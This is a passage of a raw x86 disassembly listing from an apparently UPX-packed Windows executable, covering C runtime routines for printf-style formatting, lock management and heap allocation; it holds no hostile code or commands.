loc_41C996: ; CODE XREF: sub_41C6EE+2A2�j
; sub_41C6EE+4E1�j
mov ecx, [ebp+1D4h+var_214]
cmp ecx, 0FFFFFFFFh
jnz short loc_41C9A3
mov ecx, 7FFFFFFFh
loc_41C9A3: ; CODE XREF: sub_41C6EE+2AE�j
add [ebp+1D4h+arg_8], 4
test word ptr [ebp+1D4h+var_210], 810h
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
mov [ebp+1D4h+var_218], eax
jz loc_41CC06
test eax, eax
jnz short loc_41C9CE
mov eax, off_42A714
mov [ebp+1D4h+var_218], eax
loc_41C9CE: ; CODE XREF: sub_41C6EE+2D6�j
mov eax, [ebp+1D4h+var_218]
mov [ebp+1D4h+var_230], 1
jmp loc_41CBF8
; ---------------------------------------------------------------------------
loc_41C9DD: ; CODE XREF: sub_41C6EE+28D�j
; sub_41C6EE+291�j
mov [ebp+1D4h+var_240], 1
add bl, 20h
loc_41C9E7: ; CODE XREF: sub_41C6EE+26D�j
or [ebp+1D4h+var_210], 40h
cmp [ebp+1D4h+var_214], 0
lea esi, [ebp+1D4h+var_20C]
mov [ebp+1D4h+var_218], esi
jge loc_41CAF4
mov [ebp+1D4h+var_214], 6
jmp loc_41CB3B
; ---------------------------------------------------------------------------
loc_41CA07: ; CODE XREF: sub_41C6EE+285�j
test word ptr [ebp+1D4h+var_210], 830h
jnz short loc_41CA13
or byte ptr [ebp+1D4h+var_210+1], 8
loc_41CA13: ; CODE XREF: sub_41C6EE+31F�j
; sub_41C6EE+362�j
add [ebp+1D4h+arg_8], 4
test word ptr [ebp+1D4h+var_210], 810h
mov eax, [ebp+1D4h+arg_8]
jz short loc_41CA8D
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+1D4h+var_20C]
push eax
call sub_421CAE
test eax, eax
pop ecx
pop ecx
mov [ebp+1D4h+var_21C], eax
jge short loc_41CA9A
mov [ebp+1D4h+var_238], 1
jmp short loc_41CA9A
; ---------------------------------------------------------------------------
loc_41CA48: ; CODE XREF: sub_41C6EE+276�j
sub eax, 5Ah
jz short loc_41CAA5
sub eax, 9
jz short loc_41CA13
dec eax
jnz loc_41CD8B
loc_41CA59: ; CODE XREF: sub_41C6EE+4C5�j
or [ebp+1D4h+var_210], 40h
loc_41CA5D: ; CODE XREF: sub_41C6EE+4E9�j
mov [ebp+1D4h+var_21C], 0Ah
loc_41CA64: ; CODE XREF: sub_41C6EE+551�j
; sub_41C6EE+56A�j ...
mov ebx, [ebp+1D4h+var_210]
mov esi, 8000h
test ebx, esi
jz loc_41CCA7
mov ecx, [ebp+1D4h+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+1D4h+arg_8], ecx
jmp loc_41CCD5
; ---------------------------------------------------------------------------
loc_41CA8D: ; CODE XREF: sub_41C6EE+338�j
mov al, [eax-4]
mov [ebp+1D4h+var_20C], al
mov [ebp+1D4h+var_21C], 1
loc_41CA9A: ; CODE XREF: sub_41C6EE+34F�j
; sub_41C6EE+358�j
lea eax, [ebp+1D4h+var_20C]
mov [ebp+1D4h+var_218], eax
jmp loc_41CD8B
; ---------------------------------------------------------------------------
loc_41CAA5: ; CODE XREF: sub_41C6EE+35D�j
add [ebp+1D4h+arg_8], 4
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_41CAE6
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41CAE6
test byte ptr [ebp+1D4h+var_210+1], 8
movsx eax, word ptr [eax]
mov [ebp+1D4h+var_218], ecx
jz short loc_41CADD
cdq
sub eax, edx
sar eax, 1
mov [ebp+1D4h+var_230], 1
jmp loc_41CD88
; ---------------------------------------------------------------------------
loc_41CADD: ; CODE XREF: sub_41C6EE+3DC�j
and [ebp+1D4h+var_230], 0
jmp loc_41CD88
; ---------------------------------------------------------------------------
loc_41CAE6: ; CODE XREF: sub_41C6EE+3C9�j
; sub_41C6EE+3D0�j
mov eax, off_42A710
mov [ebp+1D4h+var_218], eax
push eax
jmp loc_41CBA5
; ---------------------------------------------------------------------------
loc_41CAF4: ; CODE XREF: sub_41C6EE+307�j
jnz short loc_41CB04
cmp bl, 67h
jnz short loc_41CB3B
mov [ebp+1D4h+var_214], 1
jmp short loc_41CB3B
; ---------------------------------------------------------------------------
loc_41CB04: ; CODE XREF: sub_41C6EE:loc_41CAF4�j
mov eax, 200h
cmp [ebp+1D4h+var_214], eax
jle short loc_41CB11
mov [ebp+1D4h+var_214], eax
loc_41CB11: ; CODE XREF: sub_41C6EE+41E�j
mov edi, 0A3h
cmp [ebp+1D4h+var_214], edi
jle short loc_41CB3B
mov eax, [ebp+1D4h+var_214]
add eax, 15Dh
push eax
call sub_419DCB
test eax, eax
pop ecx
mov [ebp+1D4h+var_234], eax
jz short loc_41CB38
mov [ebp+1D4h+var_218], eax
mov esi, eax
jmp short loc_41CB3B
; ---------------------------------------------------------------------------
loc_41CB38: ; CODE XREF: sub_41C6EE+441�j
mov [ebp+1D4h+var_214], edi
loc_41CB3B: ; CODE XREF: sub_41C6EE+314�j
; sub_41C6EE+40B�j ...
mov eax, [ebp+1D4h+arg_8]
mov ecx, [eax]
push [ebp+1D4h+var_240]
add eax, 8
push [ebp+1D4h+var_214]
mov [ebp+1D4h+arg_8], eax
mov eax, [eax-4]
mov [ebp+1D4h+var_250], eax
movsx eax, bl
push eax
lea eax, [ebp+1D4h+var_254]
push esi
push eax
mov [ebp+1D4h+var_254], ecx
call off_42AD10
mov edi, [ebp+1D4h+var_210]
add esp, 14h
and edi, 80h
jz short loc_41CB86
cmp [ebp+1D4h+var_214], 0
jnz short loc_41CB86
push esi
call off_42AD1C
pop ecx
loc_41CB86: ; CODE XREF: sub_41C6EE+488�j
; sub_41C6EE+48E�j
cmp bl, 67h
jnz short loc_41CB97
test edi, edi
jnz short loc_41CB97
push esi
call off_42AD14
pop ecx
loc_41CB97: ; CODE XREF: sub_41C6EE+49B�j
; sub_41C6EE+49F�j
cmp byte ptr [esi], 2Dh
jnz short loc_41CBA4
or byte ptr [ebp+1D4h+var_210+1], 1
inc esi
mov [ebp+1D4h+var_218], esi
loc_41CBA4: ; CODE XREF: sub_41C6EE+4AC�j
push esi
loc_41CBA5: ; CODE XREF: sub_41C6EE+401�j
call sub_41FAB0
pop ecx
jmp loc_41CD88
; ---------------------------------------------------------------------------
loc_41CBB0: ; CODE XREF: sub_41C6EE+264�j
sub eax, 69h
jz loc_41CA59
sub eax, 5
jz loc_41CC77
dec eax
jz loc_41CC5D
dec eax
jz short loc_41CC2A
sub eax, 3
jz loc_41C996
dec eax
dec eax
jz loc_41CA5D
sub eax, 3
jnz loc_41CD8B
mov [ebp+1D4h+var_23C], 27h
jmp short loc_41CC34
; ---------------------------------------------------------------------------
loc_41CBEF: ; CODE XREF: sub_41C6EE+50C�j
dec ecx
cmp word ptr [eax], 0
jz short loc_41CBFC
inc eax
inc eax
loc_41CBF8: ; CODE XREF: sub_41C6EE+2EA�j
test ecx, ecx
jnz short loc_41CBEF
loc_41CBFC: ; CODE XREF: sub_41C6EE+506�j
sub eax, [ebp+1D4h+var_218]
sar eax, 1
jmp loc_41CD88
; ---------------------------------------------------------------------------
loc_41CC06: ; CODE XREF: sub_41C6EE+2CE�j
test eax, eax
jnz short loc_41CC12
mov eax, off_42A710
mov [ebp+1D4h+var_218], eax
loc_41CC12: ; CODE XREF: sub_41C6EE+51A�j
mov eax, [ebp+1D4h+var_218]
jmp short loc_41CC1E
; ---------------------------------------------------------------------------
loc_41CC17: ; CODE XREF: sub_41C6EE+532�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_41CC22
inc eax
loc_41CC1E: ; CODE XREF: sub_41C6EE+527�j
test ecx, ecx
jnz short loc_41CC17
loc_41CC22: ; CODE XREF: sub_41C6EE+52D�j
sub eax, [ebp+1D4h+var_218]
jmp loc_41CD88
; ---------------------------------------------------------------------------
loc_41CC2A: ; CODE XREF: sub_41C6EE+4DC�j
mov [ebp+1D4h+var_214], 8
loc_41CC31: ; CODE XREF: sub_41C6EE+27C�j
mov [ebp+1D4h+var_23C], ecx
loc_41CC34: ; CODE XREF: sub_41C6EE+4FF�j
test byte ptr [ebp+1D4h+var_210], 80h
mov [ebp+1D4h+var_21C], 10h
jz loc_41CA64
mov al, byte ptr [ebp+1D4h+var_23C]
add al, 51h
mov [ebp+1D4h+var_224], 30h
mov [ebp+1D4h+var_223], al
mov [ebp+1D4h+var_228], 2
jmp loc_41CA64
; ---------------------------------------------------------------------------
loc_41CC5D: ; CODE XREF: sub_41C6EE+4D5�j
test byte ptr [ebp+1D4h+var_210], 80h
mov [ebp+1D4h+var_21C], 8
jz loc_41CA64
or byte ptr [ebp+1D4h+var_210+1], 2
jmp loc_41CA64
; ---------------------------------------------------------------------------
loc_41CC77: ; CODE XREF: sub_41C6EE+4CE�j
add [ebp+1D4h+arg_8], 4
test byte ptr [ebp+1D4h+var_210], 20h
mov eax, [ebp+1D4h+arg_8]
mov eax, [eax-4]
jz short loc_41CC96
mov cx, word ptr [ebp+1D4h+var_220]
mov [eax], cx
jmp short loc_41CC9B
; ---------------------------------------------------------------------------
loc_41CC96: ; CODE XREF: sub_41C6EE+59D�j
mov ecx, [ebp+1D4h+var_220]
mov [eax], ecx
loc_41CC9B: ; CODE XREF: sub_41C6EE+5A6�j
mov [ebp+1D4h+var_238], 1
jmp loc_41CE8C
; ---------------------------------------------------------------------------
loc_41CCA7: ; CODE XREF: sub_41C6EE+380�j
add [ebp+1D4h+arg_8], 4
test bl, 20h
mov eax, [ebp+1D4h+arg_8]
jz short loc_41CCCB
test bl, 40h
jz short loc_41CCC5
movsx eax, word ptr [eax-4]
loc_41CCC2: ; CODE XREF: sub_41C6EE+5DB�j
; sub_41C6EE+5E3�j
cdq
jmp short loc_41CCD5
; ---------------------------------------------------------------------------
loc_41CCC5: ; CODE XREF: sub_41C6EE+5CE�j
movzx eax, word ptr [eax-4]
jmp short loc_41CCC2
; ---------------------------------------------------------------------------
loc_41CCCB: ; CODE XREF: sub_41C6EE+5C9�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_41CCC2
xor edx, edx
loc_41CCD5: ; CODE XREF: sub_41C6EE+39A�j
; sub_41C6EE+5D5�j
test bl, 40h
jz short loc_41CCEF
test edx, edx
jg short loc_41CCEF
jl short loc_41CCE4
test eax, eax
jnb short loc_41CCEF
loc_41CCE4: ; CODE XREF: sub_41C6EE+5F0�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+1D4h+var_210+1], 1
loc_41CCEF: ; CODE XREF: sub_41C6EE+5EA�j
; sub_41C6EE+5EE�j ...
test [ebp+1D4h+var_210], esi
mov ebx, eax
mov edi, edx
jnz short loc_41CCFA
xor edi, edi
loc_41CCFA: ; CODE XREF: sub_41C6EE+608�j
cmp [ebp+1D4h+var_214], 0
jge short loc_41CD09
mov [ebp+1D4h+var_214], 1
jmp short loc_41CD1A
; ---------------------------------------------------------------------------
loc_41CD09: ; CODE XREF: sub_41C6EE+610�j
and [ebp+1D4h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1D4h+var_214], eax
jle short loc_41CD1A
mov [ebp+1D4h+var_214], eax
loc_41CD1A: ; CODE XREF: sub_41C6EE+619�j
; sub_41C6EE+627�j
mov eax, ebx
or eax, edi
jnz short loc_41CD24
and [ebp+1D4h+var_228], 0
loc_41CD24: ; CODE XREF: sub_41C6EE+630�j
lea esi, [ebp+1D4h+var_D]
loc_41CD2A: ; CODE XREF: sub_41C6EE+66E�j
mov eax, [ebp+1D4h+var_214]
dec [ebp+1D4h+var_214]
test eax, eax
jg short loc_41CD3A
mov eax, ebx
or eax, edi
jz short loc_41CD5E
loc_41CD3A: ; CODE XREF: sub_41C6EE+644�j
mov eax, [ebp+1D4h+var_21C]
cdq
push edx
push eax
push edi
push ebx
call sub_421CE0
add ecx, 30h
cmp ecx, 39h
mov [ebp+1D4h+var_248], ebx
mov ebx, eax
mov edi, edx
jle short loc_41CD59
add ecx, [ebp+1D4h+var_23C]
loc_41CD59: ; CODE XREF: sub_41C6EE+666�j
mov [esi], cl
dec esi
jmp short loc_41CD2A
; ---------------------------------------------------------------------------
loc_41CD5E: ; CODE XREF: sub_41C6EE+64A�j
lea eax, [ebp+1D4h+var_D]
sub eax, esi
inc esi
test byte ptr [ebp+1D4h+var_210+1], 2
mov [ebp+1D4h+var_21C], eax
mov [ebp+1D4h+var_218], esi
jz short loc_41CD8B
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_41CD7E
test eax, eax
jnz short loc_41CD8B
loc_41CD7E: ; CODE XREF: sub_41C6EE+68A�j
dec [ebp+1D4h+var_218]
mov ecx, [ebp+1D4h+var_218]
mov byte ptr [ecx], 30h
inc eax
loc_41CD88: ; CODE XREF: sub_41C6EE+3EA�j
; sub_41C6EE+3F3�j ...
mov [ebp+1D4h+var_21C], eax
loc_41CD8B: ; CODE XREF: sub_41C6EE+296�j
; sub_41C6EE+365�j ...
cmp [ebp+1D4h+var_238], 0
jnz loc_41CE8C
mov ebx, [ebp+1D4h+var_210]
test bl, 40h
jz short loc_41CDC3
test bh, 1
jz short loc_41CDA8
mov [ebp+1D4h+var_224], 2Dh
jmp short loc_41CDBC
; ---------------------------------------------------------------------------
loc_41CDA8: ; CODE XREF: sub_41C6EE+6B2�j
test bl, 1
jz short loc_41CDB3
mov [ebp+1D4h+var_224], 2Bh
jmp short loc_41CDBC
; ---------------------------------------------------------------------------
loc_41CDB3: ; CODE XREF: sub_41C6EE+6BD�j
test bl, 2
jz short loc_41CDC3
mov [ebp+1D4h+var_224], 20h
loc_41CDBC: ; CODE XREF: sub_41C6EE+6B8�j
; sub_41C6EE+6C3�j
mov [ebp+1D4h+var_228], 1
loc_41CDC3: ; CODE XREF: sub_41C6EE+6AD�j
; sub_41C6EE+6C8�j
mov esi, [ebp+1D4h+var_22C]
sub esi, [ebp+1D4h+var_228]
sub esi, [ebp+1D4h+var_21C]
test bl, 0Ch
jnz short loc_41CDE5
push [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
push esi
push 20h
call sub_41C693
add esp, 0Ch
loc_41CDE5: ; CODE XREF: sub_41C6EE+6E1�j
push [ebp+1D4h+var_228]
mov edi, [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
lea ecx, [ebp+1D4h+var_224]
call sub_41C6B7
test bl, 8
pop ecx
jz short loc_41CE13
test bl, 4
jnz short loc_41CE13
push edi
push esi
push 30h
lea eax, [ebp+1D4h+var_220]
call sub_41C693
add esp, 0Ch
loc_41CE13: ; CODE XREF: sub_41C6EE+70F�j
; sub_41C6EE+714�j
cmp [ebp+1D4h+var_230], 0
jz short loc_41CE63
cmp [ebp+1D4h+var_21C], 0
jle short loc_41CE63
mov eax, [ebp+1D4h+var_21C]
mov ebx, [ebp+1D4h+var_218]
mov [ebp+1D4h+var_248], eax
loc_41CE28: ; CODE XREF: sub_41C6EE+771�j
dec [ebp+1D4h+var_248]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+1D4h+var_C]
push eax
call sub_421CAE
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_41CE72
mov edi, [ebp+1D4h+arg_0]
push eax
lea eax, [ebp+1D4h+var_220]
lea ecx, [ebp+1D4h+var_C]
call sub_41C6B7
cmp [ebp+1D4h+var_248], 0
pop ecx
jnz short loc_41CE28
jmp short loc_41CE72
; ---------------------------------------------------------------------------
loc_41CE63: ; CODE XREF: sub_41C6EE+729�j
; sub_41C6EE+72F�j
push [ebp+1D4h+var_21C]
mov ecx, [ebp+1D4h+var_218]
lea eax, [ebp+1D4h+var_220]
call sub_41C6B7
pop ecx
loc_41CE72: ; CODE XREF: sub_41C6EE+755�j
; sub_41C6EE+773�j
test byte ptr [ebp+1D4h+var_210], 4
jz short loc_41CE8C
push [ebp+1D4h+arg_0]
lea eax, [ebp+1D4h+var_220]
push esi
push 20h
call sub_41C693
add esp, 0Ch
loc_41CE8C: ; CODE XREF: sub_41C6EE+5B4�j
; sub_41C6EE+6A1�j ...
cmp [ebp+1D4h+var_234], 0
jz short loc_41CE9F ; default
push [ebp+1D4h+var_234]
call sub_419DDD
and [ebp+1D4h+var_234], 0
pop ecx
loc_41CE9F: ; CODE XREF: sub_41C6EE+7F�j
; sub_41C6EE+A4�j ...
mov edi, [ebp+1D4h+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_41C72B
loc_41CEAF: ; CODE XREF: sub_41C6EE+4B�j
pop edi
pop esi
loc_41CEB1: ; CODE XREF: sub_41C6EE+31�j
mov ecx, [ebp+1D4h+var_4]
mov eax, [ebp+1D4h+var_220]
pop ebx
call sub_4192B6
add ebp, 1D4h
leave
retn
sub_41C6EE endp
; ---------------------------------------------------------------------------
off_41CEC8 dd offset loc_41C90A ; DATA XREF: sub_41C6EE+85�r
dd offset loc_41C77A ; jump table for switch statement
dd offset loc_41C797
dd offset loc_41C7E3
dd offset loc_41C824
dd offset loc_41C82D
dd offset loc_41C86B
dd offset loc_41C94C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEE8 proc near ; CODE XREF: sub_419BE2+2A�p
; sub_41A6FD+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_41CF06
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41CF5A
; ---------------------------------------------------------------------------
loc_41CF06: ; CODE XREF: sub_41CEE8+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_41CF2B
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
mov [ebp+var_2], 0
pop eax
jmp short loc_41CF35
; ---------------------------------------------------------------------------
loc_41CF2B: ; CODE XREF: sub_41CEE8+32�j
mov [ebp+var_4], al
xor eax, eax
mov [ebp+var_3], 0
inc eax
loc_41CF35: ; CODE XREF: sub_41CEE8+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_420DD8
add esp, 1Ch
test eax, eax
jnz short loc_41CF56
leave
retn
; ---------------------------------------------------------------------------
loc_41CF56: ; CODE XREF: sub_41CEE8+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_41CF5A: ; CODE XREF: sub_41CEE8+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_41CEE8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41CF60 proc near ; CODE XREF: sub_41ED2E+A49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_41CF79
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_41CF79: ; CODE XREF: sub_41CF60+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_41CF60 endp
; =============== S U B R O U T I N E =======================================
sub_41CF94 proc near ; CODE XREF: sub_41B4E8�p
push esi
push edi
xor esi, esi
mov edi, offset dword_44BEF0
loc_41CF9D: ; CODE XREF: sub_41CF94+35�j
cmp dword_42A724[esi*8], 1
jnz short loc_41CFC5
lea eax, ds:42A720h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_421D85
test eax, eax
pop ecx
pop ecx
jz short loc_41CFD1
loc_41CFC5: ; CODE XREF: sub_41CF94+11�j
inc esi
cmp esi, 24h
jl short loc_41CF9D
xor eax, eax
inc eax
loc_41CFCE: ; CODE XREF: sub_41CF94+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CFD1: ; CODE XREF: sub_41CF94+2F�j
and off_42A720[esi*8], 0
xor eax, eax
jmp short loc_41CFCE
sub_41CF94 endp
; =============== S U B R O U T I N E =======================================
sub_41CFDD proc near ; CODE XREF: sub_41B313:loc_41B32B�j
push ebx
mov ebx, dword_42417C
push esi
mov esi, offset off_42A720
push edi
loc_41CFEB: ; CODE XREF: sub_41CFDD+30�j
mov edi, [esi]
test edi, edi
jz short loc_41D004
cmp dword ptr [esi+4], 1
jz short loc_41D004
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_419DDD
and dword ptr [esi], 0
pop ecx
loc_41D004: ; CODE XREF: sub_41CFDD+12�j
; sub_41CFDD+18�j
add esi, 8
cmp esi, offset dword_42A840
jl short loc_41CFEB
mov esi, offset off_42A720
pop edi
loc_41D015: ; CODE XREF: sub_41CFDD+50�j
mov eax, [esi]
test eax, eax
jz short loc_41D024
cmp dword ptr [esi+4], 1
jnz short loc_41D024
push eax
call ebx ; RtlDeleteCriticalSection
loc_41D024: ; CODE XREF: sub_41CFDD+3C�j
; sub_41CFDD+42�j
add esi, 8
cmp esi, offset dword_42A840
jl short loc_41D015
pop esi
pop ebx
retn
sub_41CFDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D032 proc near ; CODE XREF: sub_419D96+2�p
; sub_419E30+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_42A720[eax*8]
call dword_4241B0 ; RtlLeaveCriticalSection
pop ebp
retn
sub_41D032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D047 proc near ; CODE XREF: sub_41D0E7+14�p
; sub_41E70A+4F�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_425510
call __SEH_prolog
mov esi, [ebp+arg_0]
lea esi, ds:42A720h[esi*8]
xor ebx, ebx
cmp [esi], ebx
jnz short loc_41D0D5
push 18h
call sub_419DCB
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_41D07E
call sub_41E685
mov dword ptr [eax], 0Ch
jmp short loc_41D0BD
; ---------------------------------------------------------------------------
loc_41D07E: ; CODE XREF: sub_41D047+28�j
push 0Ah
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_41D0C5
push 0FA0h
push edi
call sub_421D85
pop ecx
pop ecx
test eax, eax
jnz short loc_41D0C1
push edi
call sub_419DDD
call sub_41E685
mov dword ptr [eax], 0Ch
push 0FFFFFFFFh
lea eax, [ebp+ms_exc.prev_er]
push eax
call sub_41979A
add esp, 0Ch
loc_41D0BD: ; CODE XREF: sub_41D047+35�j
xor eax, eax
jmp short loc_41D0D8
; ---------------------------------------------------------------------------
loc_41D0C1: ; CODE XREF: sub_41D047+55�j
mov [esi], edi
jmp short loc_41D0CC
; ---------------------------------------------------------------------------
loc_41D0C5: ; CODE XREF: sub_41D047+44�j
push edi
call sub_419DDD
pop ecx
loc_41D0CC: ; CODE XREF: sub_41D047+7C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41D0DE
loc_41D0D5: ; CODE XREF: sub_41D047+1A�j
xor eax, eax
inc eax
loc_41D0D8: ; CODE XREF: sub_41D047+78�j
call __SEH_epilog
retn
sub_41D047 endp
; =============== S U B R O U T I N E =======================================
sub_41D0DE proc near ; CODE XREF: sub_41D047+89�p
; DATA XREF: UPX0:stru_425510�o
push 0Ah
call sub_41D032
pop ecx
retn
sub_41D0DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0E7 proc near ; CODE XREF: sub_419D24+22�p
; sub_419DDD+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:42A720h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_41D10D
push eax
call sub_41D047
test eax, eax
pop ecx
jnz short loc_41D10D
push 11h
call sub_41A4AE
pop ecx
loc_41D10D: ; CODE XREF: sub_41D0E7+11�j
; sub_41D0E7+1C�j
push dword ptr [esi]
call dword_4241AC ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_41D0E7 endp
; =============== S U B R O U T I N E =======================================
sub_41D118 proc near ; CODE XREF: sub_41D132+20�p
cmp dword_44C048, 2
jnz short loc_41D12E
cmp dword_44C054, 5
jb short loc_41D12E
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D12E: ; CODE XREF: sub_41D118+7�j
; sub_41D118+10�j
push 3
pop eax
retn
sub_41D118 endp
; =============== S U B R O U T I N E =======================================
sub_41D132 proc near ; CODE XREF: start-65750�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call dword_424168 ; HeapCreate
test eax, eax
mov ds:dword_47C770, eax
jz short loc_41D17C
call sub_41D118
cmp eax, 3
mov ds:dword_47C774, eax
jnz short loc_41D17F
push 3F8h
call sub_41D183
test eax, eax
pop ecx
jnz short loc_41D17F
push ds:dword_47C770
call dword_42416C ; HeapDestroy
loc_41D17C: ; CODE XREF: sub_41D132+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D17F: ; CODE XREF: sub_41D132+2D�j
; sub_41D132+3C�j
xor eax, eax
inc eax
retn
sub_41D132 endp
; =============== S U B R O U T I N E =======================================
sub_41D183 proc near ; CODE XREF: sub_41D132+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_47C770
call dword_424198 ; RtlAllocateHeap
test eax, eax
mov ds:dword_47C75C, eax
jnz short loc_41D1A0
retn
; ---------------------------------------------------------------------------
loc_41D1A0: ; CODE XREF: sub_41D183+1A�j
mov ecx, [esp+arg_0]
and ds:dword_47C754, 0
and ds:dword_47C758, 0
mov ds:dword_47C764, eax
xor eax, eax
mov ds:dword_47C760, ecx
mov ds:dword_47C768, 10h
inc eax
retn
sub_41D183 endp
; =============== S U B R O U T I N E =======================================
sub_41D1CB proc near ; CODE XREF: sub_419DDD+29�p
; sub_41E82C+5B�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_47C758
lea ecx, [eax+eax*4]
mov eax, ds:dword_47C75C
lea ecx, [eax+ecx*4]
jmp short loc_41D1EF
; ---------------------------------------------------------------------------
loc_41D1DD: ; CODE XREF: sub_41D1CB+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41D1F5
add eax, 14h
loc_41D1EF: ; CODE XREF: sub_41D1CB+10�j
cmp eax, ecx
jb short loc_41D1DD
xor eax, eax
locret_41D1F5: ; CODE XREF: sub_41D1CB+1F�j
retn
sub_41D1CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1F6 proc near ; CODE XREF: sub_419DDD+38�p
; sub_41E82C+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41D50A
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41D2C1
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41D259
push 3Fh
pop edx
loc_41D259: ; CODE XREF: sub_41D1F6+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41D2A3
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_41D284
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41D2A0
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41D2A0
; ---------------------------------------------------------------------------
loc_41D284: ; CODE XREF: sub_41D1F6+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41D2A0
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41D2A0: ; CODE XREF: sub_41D1F6+85�j
; sub_41D1F6+8C�j ...
mov ebx, [ebp+arg_4]
loc_41D2A3: ; CODE XREF: sub_41D1F6+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_41D2C1: ; CODE XREF: sub_41D1F6+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41D2CF
push 3Fh
pop edx
loc_41D2CF: ; CODE XREF: sub_41D1F6+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
